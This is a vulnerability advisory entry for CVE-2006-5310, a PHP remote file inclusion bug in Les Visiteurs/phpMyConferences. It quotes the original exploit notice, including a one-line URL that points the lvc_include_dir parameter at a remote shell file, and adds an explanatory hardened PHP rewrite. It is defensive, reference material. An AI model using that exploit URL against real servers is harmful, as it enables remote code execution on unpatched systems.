J-Pierre DEZELUS Les Visiteurs 'menus.inc.php' PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1111281    Vulnerability type: Code injection
Published: 2006-10-13    Updated: 2006-10-17
CVE: CVE-2006-5310    CNNVD ID: CNNVD-200610-257
Platform: PHP    CVSS score: 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/2535
https://www.securityfocus.com/bid/84588
https://cxsecurity.com/issue/WLB-2006100097
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-257
|Vulnerability details
PHP remote file inclusion vulnerability in common/visiteurs/include/menus.inc.php in J-Pierre DEZELUS Les Visiteurs 2.0.1, as used in phpMyConferences (phpMyConference) 8.0.2 and possibly other products, allows remote attackers to execute arbitrary PHP code via a URL in the lvc_include_dir parameter.
|Vulnerability exploit (EXP)
#########################################################################
# phpMyConferences <= 8.0.2 Remote File Inclusion
# Download Source : http://sedre.loria.fr/phpMyConference/phpMyConferences_8.0.2.zip
#
# Found By        : k1tk4t - k1tk4t[4t]newhack.org
# Location        : Indonesia   --  #newhack[dot]org
########################################################################
file ;
 menus.inc.php
########################################################################
bugs ;
 include($lvc_include_dir.'/menus-'.$view.'.inc.php');
 include($lvc_include_dir.'/menus-others.inc.php');
########################################################################
example and method of exploit ;
 http://localhost/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=http://shell/cmd.kid?
########################################################################
Thanks;
str0ke
milw0rm
google
#e-c-h-o (all member echo community)
#nyubi (all member solpotcrew community)
#asiahacker
person;
y3dips,lirva32,the_day,K-159(&all echo staff)
evilcode,illibero,NoGe(asiahacker),
nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)

# milw0rm.com [2006-10-13]
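
The two include lines quoted in the advisory build their path from $lvc_include_dir, a variable that (with register_globals enabled) can be set straight from the query string; because PHP will fetch and include a URL when allow_url_fopen (or, from PHP 5.2 on, allow_url_include) is on, the lvc_include_dir URL in the advisory becomes remote code execution. Below is an added example, not code from Les Visiteurs or phpMyConferences, showing the reported pattern beside a hardened rewrite; the allow-list of view names, the function name lvc_menu_path and the `view` request parameter are assumptions made for illustration.

```php
<?php
// Added example (not from the Les Visiteurs / phpMyConferences code base).
// Assumption: this file lives in common/visiteurs/include/ and the menu
// fragments (menus-<view>.inc.php, menus-others.inc.php) sit beside it.

// --- Vulnerable pattern as reported. With register_globals on, $lvc_include_dir
// (and possibly $view) can be supplied by the request, so the include path can
// be pointed at any local file or, if URL includes are enabled, at a remote one:
//   include($lvc_include_dir.'/menus-'.$view.'.inc.php');
//   include($lvc_include_dir.'/menus-others.inc.php');

// --- Hardened version.
// 1. Never take the include directory from the request: pin it to a constant.
define('LVC_INCLUDE_DIR', __DIR__);

// 2. Only accept view names from a fixed allow-list (values constructed here).
const LVC_ALLOWED_VIEWS = ['day', 'week', 'month'];

/**
 * Resolve the menu fragment for $view, or return null if the request is not
 * acceptable. The caller decides what to do with null (default view, HTTP 400).
 */
function lvc_menu_path(string $view): ?string
{
    // Rejecting anything outside the allow-list also blocks "../" sequences
    // and wrapper prefixes such as "http://" or "php://" smuggled in via $view.
    if (!in_array($view, LVC_ALLOWED_VIEWS, true)) {
        return null;
    }
    $path = LVC_INCLUDE_DIR . '/menus-' . $view . '.inc.php';

    // 3. Defence in depth: the resolved file must really live under LVC_INCLUDE_DIR.
    $real = realpath($path);
    $base = realpath(LVC_INCLUDE_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// Read the view explicitly from the request instead of relying on register_globals.
$view = isset($_GET['view']) ? (string) $_GET['view'] : 'day';
$menu = lvc_menu_path($view);
if ($menu === null) {
    http_response_code(400);
    exit('invalid view');
}
include $menu;                                   // validated local path only
include LVC_INCLUDE_DIR . '/menus-others.inc.php'; // directory is no longer user-controlled
```

Independently of the code fix, setting allow_url_include=Off (and, on PHP older than 5.2, allow_url_fopen=Off) in php.ini removes the remote half of this bug class server-wide, though it does not stop local file inclusion through the same parameter.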
|Affected products
Phpmyconferences Phpmyconferences 8.0.2
J-Pierre Dezelus Les Visiteurs 2.0.1
|References

Source: XF
Name: phpmyconferences-menus-file-include (29514)
Link: http://xforce.iss.net/xforce/xfdb/29514
Source: BUGTRAQ
Name: 20061013 phpMyConferences <= 8.0.2 Remote File Inclusion
Link: http://www.securityfocus.com/archive/1/archive/1/448547/100/0/threaded
Source: MILW0RM
Name: 2535
Link: http://www.milw0rm.com/exploits/2535
Source: VUPEN
Name: ADV-2006-4045
Link: http://www.frsirt.com/english/advisories/2006/4045
Source: SECUNIA
Name: 22411
Link: http://secunia.com/advisories/22411
Source: MILW0RM
Name: 2535
Link: http://milw0rm.com/exploits/2535
Source: BID
Name: 20505
Link: http://www.securityfocus.com/bid/20505
Source: SREASON
Name: 1733
Link: http://securityreason.com/securityalert/1733